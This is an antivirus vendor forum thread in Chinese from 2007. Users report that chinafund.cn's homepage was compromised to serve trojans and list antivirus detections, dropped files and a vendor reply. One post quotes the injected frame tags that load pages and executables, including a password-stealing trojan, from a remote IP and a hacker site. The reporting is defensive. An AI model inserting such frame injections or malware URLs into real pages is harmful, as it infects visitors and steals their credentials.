瑞星卡卡安全论坛

中国基金网http://www.chinafund.cn/首页被挂马
2007年1月28日晚，我登录中国基金网http://www.chinafund.cn/，当时开着正版的瑞星19.07.42病毒监控和防火墙。网页一打开瑞星就接连报毒，共报了两种类型5个木马。由于现在黑客经常挂自制的马或免杀马，我担心会有瑞星查不出来的马，所以现在正在搜索硬盘中在同一时间创建的文件，发现可疑文件后我会上报给瑞星公司。
希望大家在登录http://www.chinafund.cn/时小心！！！

也希望高手能登录一下http://www.chinafund.cn/，分析一下挂在网页上的木马，看看有没有未知的新木马。

1

附件: 293892007128235033.jpg

2

附件: 293892007128235048.jpg

3

附件: 293892007128235101.jpg

4

附件: 293892007128235113.jpg

目前瑞星不杀！

当心啦！

这个东西瑞星一直不报毒..他能给声卡静音..求助的人很多 没听到谁说 瑞星报这个毒...有时间我也想去看看  嘎嘎..

看得我俩眼发直..

还是没找到代码..

引用:

【mopery的贴子】看得我俩眼发直.. 还是没找到代码.. ………………

...可惜偶不会看  要8偶去帮你 hoho

病毒代码要怎么才能看到?是什么样哒...

<frame src="http://60.190.133.101/mf/m1.htm">
htp://60.190.133.101/mf/hjtz_xyq.exe

<frame src="http://60.190.133.101/wl/w1.htm">
htp://60.190.133.101/wl/hjtz_wl.exe

<frame src="http://60.190.133.101/mf/m2.htm">
htp://60.190.133.101/mf/hjtz_xyq.exe

<frame src="http://60.190.133.101/wl/w2.htm">
htp://60.190.133.101/wl/hjtz_wl.exe

<frame src="http://60.190.133.101/gz/g.htm">
htp://60.190.133.101/gz/s.exe

<frame src="http://60.190.133.101/gz/ak.htm">
htp://www.tmdhack.com/attachments/month_200608/ak.exe

吃多了 没事干了 这是这小病毒拿出来吓唬人..

不去那网站的！

瑞星查到的病毒有：
Trojan.DL.VBS.Agent.cis:
在系统临时文件夹下：
120443398920.tmp 5250字节－5288字节（每次大小不一样）
21648903944.tmp 5250字节－5288字节（每次大小不一样）
21648906544.tmp 5282字节
21648906624.tmp 5288字节
21648906744.tmp 5250字节
Trojan.PSW.JHOnline.fbd
ak[1].exe 在IE临时文件夹 61440字节
algs.exe 在系统盘根目录 61440字节。

但我并没有发现上面那位朋友说的Winlog0n.exe。
此外，在c:\ProgramFiles下发现1.VBS、ak.VBS文件，在c:\还发现一个可执行文件，这三个文件创建时间与病毒文件基本相同。目前已将这三个文件上报给瑞星公司。

尊敬的客户，您好！
    您的邮件已经收到，感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
    1.文件名：winlog0n.exe
    病毒名：Trojan.PSW.WLOnline.et

    我们将在较新的19.08.10版本(瑞星2006的18.64.10版本)中处理解决，请您届时将您的瑞星软件升级到19.08.10(瑞星2006的18.64.10版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话，我们会推迟一到两版本后升级

太好了，不知道我上报的3个文件分析结果怎么样。

自从中国基金网被挂马后，这几天一直没在上那个网，也不知道现在好了没？